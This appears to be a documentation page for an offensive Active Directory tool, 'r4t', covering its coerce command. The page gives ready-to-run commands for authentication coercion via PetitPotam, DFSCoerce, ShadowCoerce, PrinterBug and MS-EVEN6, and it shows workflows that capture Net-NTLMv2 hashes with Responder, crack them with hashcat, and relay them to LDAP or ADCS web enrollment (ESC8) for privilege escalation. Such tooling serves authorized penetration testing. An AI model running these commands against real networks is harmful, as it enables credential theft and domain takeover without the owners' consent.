Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
coerce
The coerce command performs authentication coercion attacks — forcing a remote machine to authenticate back to an attacker-controlled listener using various Windows RPC protocols. This is used to capture Net-NTLMv2 hashes or relay authentication to other services (e.g., LDAP, SMB, ADCS web enrollment).
Usage
r4t coerce <method> [target] [flags]
Common Flags
These flags are shared across all coercion methods:
| Flag | Short | Description |
|---|
--listener | -L | Attacker listener IP or hostname (required) |
--username | -u | Username for RPC authentication to target |
--password | -p | Password for RPC authentication |
--hash | -H | NT hash (LM:NT or just NT) |
--domain | -d | Domain |
--dc | — | Domain controller (optional; used for Kerberos ticket resolution) |
--target-ip | — | Override target IP (SNI still uses the hostname) |
--incremental | -i | Prompt before each named pipe attempt (default: true) |
--threads | -t | Number of concurrent coercion threads (default: 1) |
Relay Flags
When --relay <host> is set, R4t starts a built-in relay server alongside the coercion attack and forwards captured authentication to the specified target. These flags are available on every method subcommand.
| Flag | Description |
|---|
--relay <host> | Relay target host — enables the built-in relay server |
--adcs | Relay type: SMB→HTTP(S) to Certificate Authority (ESC8) (default when no type is set) |
--smb | Relay type: SMB→SMB (not yet implemented) |
--ldap | Relay type: SMB→LDAP (not yet implemented) |
--ldaps | Relay type: SMB→LDAPS (not yet implemented) |
--shadow-credentials | Relay type: Shadow Credentials via LDAP (not yet implemented) |
--mssql | Relay type: SMB→MSSQL (not yet implemented) |
ADCS Relay Options
These flags apply when using --adcs (or when no relay type is specified, since ADCS is the default).
| Flag | Description |
|---|
--template <name> | Certificate template to request (required for ADCS relay) |
--https | Use HTTPS when relaying to the CA (default: HTTP port 80) |
--relay-port <port> | Override the port on the relay target (0 = protocol default) |
--ca-name <name> | CA name — kept for CLI compatibility; ignored for certsrv web relay |
Shadow Credentials Relay Options
| Flag | Description |
|---|
--shadow-target <account> | Account to inject shadow credentials into |
Subcommands
coerce petitpotam
Coerce authentication via MS-EFSRPC (Encrypting File System Remote Protocol). This is the most widely applicable coercion method.
r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com
# With specific credentials for the RPC call
r4t coerce petitpotam --listener 10.10.10.100 \
-u jsmith -p 'P@ssword1' -d corp.example.com \
dc01.corp.example.com
lsarpcefsrsamrlsassnetlogon
Use --incremental (default) to prompt before each pipe, allowing you to stop if authentication is captured.
coerce dfscoerce
Coerce authentication via MS-DFSNM (Distributed File System Namespace Management Protocol).
r4t coerce dfscoerce --listener 10.10.10.100 dc01.corp.example.com
coerce mseven
Coerce authentication via MS-EVEN6 (Event Log Remoting Protocol Version 6).
r4t coerce mseven --listener 10.10.10.100 dc01.corp.example.com
coerce shadowcoerce
Coerce authentication via MS-FSRVP (File Server Remote VSS Protocol). Commonly referred to as ShadowCoerce.
r4t coerce shadowcoerce --listener 10.10.10.100 dc01.corp.example.com
coerce printerbug
Coerce authentication via MS-RPRN (Print System Remote Protocol). This is the original “PrinterBug” / SpoolSample method.
r4t coerce printerbug --listener 10.10.10.100 dc01.corp.example.com
coerce interactive
A split-panel interactive TUI that runs a listener on one side and coercion on the other simultaneously, giving real-time feedback on captured authentications.
TUI Controls
| Key | Action |
|---|
Tab | Switch between the listener panel and coercion panel |
Ctrl+K | Kill the listener |
Ctrl+P | Pause / resume the listener |
Ctrl+S | Show / hide password |
q / Ctrl+C | Quit |
How Coercion Works
Authentication coercion exploits Windows RPC protocols that make outbound network calls using the machine account’s credentials. When you trigger one of these calls with a listener IP as the destination, the target machine authenticates to your listener.
Attacker (r4t coerce) Target Machine Attacker Listener
│ │ │
│── RPC Call (trigger) ──► │ │
│ │── NTLM Auth (Net-NTLM) ──►│
│ │ │
Captured!
- Cracked offline (Net-NTLMv2 → password)
- Relayed to another service (LDAP, SMB, ADCS web enrollment)
Common Coercion Workflows
Capture and Crack
# Start Responder (external) to capture Net-NTLMv2
sudo responder -I eth0 -w
# Coerce the target
r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com
# Crack captured hash with hashcat
hashcat -m 5600 captured.hash wordlist.txt
Relay to LDAP (Privilege Escalation via RBCD)
# Start ntlmrelayx targeting LDAP (external)
ntlmrelayx.py -t ldap://dc01.corp.example.com --delegate-access
# Coerce a server to authenticate
r4t coerce petitpotam --listener 10.10.10.100 server01.corp.example.com
Relay to ADCS Web Enrollment (ESC8)
R4t has a built-in relay for ADCS — no external ntlmrelayx needed. --template is required.
# Coerce and relay in one command — relay server starts automatically
r4t coerce petitpotam --listener 10.10.10.100 \
--relay ca.corp.example.com --adcs --template Machine \
server01.corp.example.com
# Use HTTPS if the CA only serves over 443
r4t coerce petitpotam --listener 10.10.10.100 \
--relay ca.corp.example.com --adcs --template Machine --https \
server01.corp.example.com
# Use resulting PFX to extract NT hash
r4t adcs nt --pfx /tmp/server01.pfx
Coercible Host Discovery
Before coercing, identify which hosts are susceptible:
# LDAP scan stores coercable hosts in the database
r4t ldap scan
# View results
r4t dbquery "SELECT * FROM coercables"
Coercible Hosts Database
Hosts identified as potentially coercible are stored in the coercables table:
| Column | Description |
|---|
| Host | Hostname or IP |
| Method | Which RPC protocol is likely exploitable |
| Notes | Additional context |
